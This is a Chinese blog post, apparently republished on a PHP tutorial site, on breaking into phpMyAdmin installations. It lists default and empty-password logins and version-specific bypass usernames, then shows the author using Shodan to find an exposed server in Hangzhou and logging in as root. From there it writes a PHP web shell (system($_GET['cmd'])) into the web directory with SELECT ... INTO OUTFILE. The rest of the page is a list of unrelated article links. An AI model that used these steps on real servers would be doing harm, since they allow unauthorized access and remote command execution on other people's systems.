phpMyAdmin通过密码漏洞留后门文件


Posted in PHP onNovember 20, 2018
  • 默认 phpMyAdmin:用户名 root 密码 root 或空登陆。
  • 版本 2.11.3~2.11.4:用户名 'localhost'@'@" 登陆,无需密码。
  • 版本 2.11.9.2:用户名 root 登陆,无需密码。

经测试,第二个漏洞在 phpMyAdmin 3.5.1 版本也是可行的。原理从略。

下面让我们简单的上网看看能不能找到一些存在这样漏洞的登陆页面。

祭出著名的漏洞搜索引擎 Shodan 并搜索 phpMyAdmin。

phpMyAdmin

phpMyAdmin通过密码漏洞留后门文件

先看看有没有不需要密码登陆的,逐一尝试没有后寻找名字中包含的版本号。这里我找到一个国内的(浙江省·杭州市)。

phpMyAdmin通过密码漏洞留后门文件

地址已手动打码。

http://121.***.*.219:80/

phpMyAdmin通过密码漏洞留后门文件

登陆成功(root 权限)。

phpMyAdmin通过密码漏洞留后门文件

接下来你可以写一个 outfile 到对方主机的网络目录下。俗称 “留后门”。

SELECT "<?php system($_GET[‘cmd']); ?>" into outfile "后门文件的绝对路径"

点击运行,不出意外便在对方主机留下了一个名为 runme.php 的后门文件。

总结

以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作具有一定的参考学习价值,谢谢大家对三水点靠木的支持。如果你想了解更多相关内容请查看下面相关链接

PHP 相关文章推荐
轻松修复Discuz!数据库
May 03 PHP
php fckeditor 调用的函数
Jun 21 PHP
解析用PHP实现var_export的详细介绍
Jun 20 PHP
详解PHP中strlen和mb_strlen函数的区别
Mar 07 PHP
PHP判断表单复选框选中状态完整例子
Jun 24 PHP
PHP文件读写操作相关函数总结
Nov 18 PHP
php中fgetcsv()函数用法实例
Nov 28 PHP
Thinkphp搜索时首页分页和搜索页保持条件分页的方法
Dec 05 PHP
PHP多线程编程之管道通信实例分析
Mar 07 PHP
PHP中的命名空间详细介绍
Jul 02 PHP
浅谈php错误提示及查错方法
Jul 14 PHP
关于php中的json_encode()和json_decode()函数的一些说明
Nov 20 PHP
ThinkPHP5 的简单搭建和使用详解
Nov 15 #PHP
关于php unset对json_encode的影响详解
Nov 14 #PHP
PHP集成环境XAMPP的安装与配置
Nov 13 #PHP
python进程与线程小结实例分析
Nov 11 #PHP
PHP 获取客户端 IP 地址的方法实例代码
Nov 11 #PHP
如何优雅的使用 laravel 的 validator验证方法
Nov 11 #PHP
php使用curl模拟浏览器表单上传文件或者图片的方法
Nov 10 #PHP
You might like
php+mysql实现无限分类实例详解
2015/01/15 PHP
PHP通过加锁实现并发情况下抢码功能
2016/08/10 PHP
tp5框架的增删改查操作示例
2019/10/31 PHP
JS代码格式化和语法着色V2
2006/10/14 Javascript
js里的prototype使用示例
2010/11/19 Javascript
javascript中的一些注意事项 更新中
2010/12/06 Javascript
javascript里模拟sleep(两种实现方式)
2013/01/25 Javascript
javascript实现按回车键切换焦点
2015/02/09 Javascript
js中unicode转码方法详解
2015/10/09 Javascript
javascript合并表格单元格实例代码
2016/01/03 Javascript
浅谈JS函数定义方式的区别
2016/10/30 Javascript
vue.js指令v-model实现方法
2016/12/05 Javascript
微信小程序中子页面向父页面传值实例详解
2017/03/20 Javascript
Webpack性能优化 DLL 用法详解
2017/08/10 Javascript
vue iview组件表格 render函数的使用方法详解
2018/03/15 Javascript
NodeJs项目中关闭ESLint的方法
2018/08/09 NodeJs
nuxt.js中间件实现拦截权限判断的方法
2018/11/21 Javascript
微信小程序实现页面跳转传递参数(实体,对象)
2019/08/12 Javascript
JavaScript实现简单计算器功能
2019/12/19 Javascript
javascript实现移动端上传图片功能
2020/08/18 Javascript
创建与框架无关的JavaScript插件
2020/12/01 Javascript
[00:30]明星选手化身超级英雄!2018DOTA2亚洲邀请赛全明星赛来临!
2018/04/06 DOTA
从零学python系列之新版本导入httplib模块报ImportError解决方案
2014/05/23 Python
用python登录Dr.com思路以及代码分享
2014/06/25 Python
Python模拟登陆淘宝并统计淘宝消费情况的代码实例分享
2016/07/04 Python
用Python写王者荣耀刷金币脚本
2017/12/21 Python
详解tensorflow实现迁移学习实例
2018/02/10 Python
Python、 Pycharm、Django安装详细教程(图文)
2019/04/12 Python
django queryset相加和筛选教程
2020/05/18 Python
英国的知名精品百货公司:House of Fraser(福来德)
2016/08/14 全球购物
美国球鞋寄卖网站:Stadium Goods
2018/05/09 全球购物
社区安全检查制度
2014/02/03 职场文书
八项规定个人对照检查材料思想汇报
2014/09/25 职场文书
超市工作总结范文2014
2014/12/19 职场文书
《风娃娃》教学反思
2016/02/18 职场文书
CSS中使用grid布局实现一套模板多种布局
2022/07/15 HTML / CSS